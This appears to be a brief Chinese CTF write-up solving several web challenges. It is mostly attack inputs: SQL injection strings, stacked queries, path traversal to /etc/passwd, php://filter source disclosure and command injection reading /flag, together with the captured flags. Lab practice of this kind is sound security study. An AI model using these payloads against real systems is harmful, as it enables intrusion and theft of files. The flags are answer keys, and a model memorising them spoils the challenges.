[极客大挑战 2019]EasySQL
ADMIN’
123456
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘123456’’ at line 1
’
ADMIN
123456’
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘123456’’’ at line 1
ADMIN’ OR 1#
123456
select * from users where username=‘ADMIN’ OR 1#'And password=‘123456’
ADMIN
123456’ OR 1#
select * from users where username=‘ADMIN’ and password= ‘123456’ OR 1#’
ADMIN
123456’ || 1#
OR 换成 || 一样的效果
FLAG
flag{be372315-05de-40e4-b24b-61dafe434364}
全部复制粘贴,不要只复制括号里的部分!!
[极客大挑战 2019]Havefun
FLAG
flag{4edf0e3c-ff14-4e3b-842f-3db91fa54f34}
[HCTF 2018]WarmUp
打开F12
追加source.php
换成追加hint.php,flag不在这,提示在ffffllllaaaagggg
换成ffffllllaaaagggg,报错。
加?
,打回原形,啥都没有。
前面加/?file=
,即/?file=hint.php
等于/hint.php
/?file=ffffllllaaaagggg
,看不到
FLAG
一级一级往上找/?file=hint.php?../../../../../ffffllllaaaagggg
flag{d244c7c5-d90d-4e99-b45f-3c0ea3877dc0}
[ACTF2020 新生赛]Include1
?file=../../../../../../../../../../../../../../../../etc/passwd
文件包含漏洞
- php://filter 用于读取源码
- php://input 用于执行php代码
php://filter/read=convert.base64-encode/resource=xxx # 用base64编码的方式来读文件flag.php
FLAG
/?file=php://filter/read=convert.base64-encode/resource=flag.php
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7OTZhYmE3YTgtOGY1NC00MDQxLWFjNTEtODA3ZmU1NjY2NzNmfQo=
Base64解码https://www.toolhelper.cn/EncodeDecode/Base64
flag{96aba7a8-8f54-4041-ac51-807fe566673f}
[ACTF2020 新生赛]Exec1
ip=127.0.0||ls
FLAG
ip=127.0.0||cat /flag
flag{81cfb443-3b4c-44ef-88e4-59c973e2755d}
[SUCTF 2019]EasySQL1
1,2
order
1;show databases;
1; show tables;
FLAG
*,1
flag{48283e65-0311-4248-8cf8-7d547adc6b9a}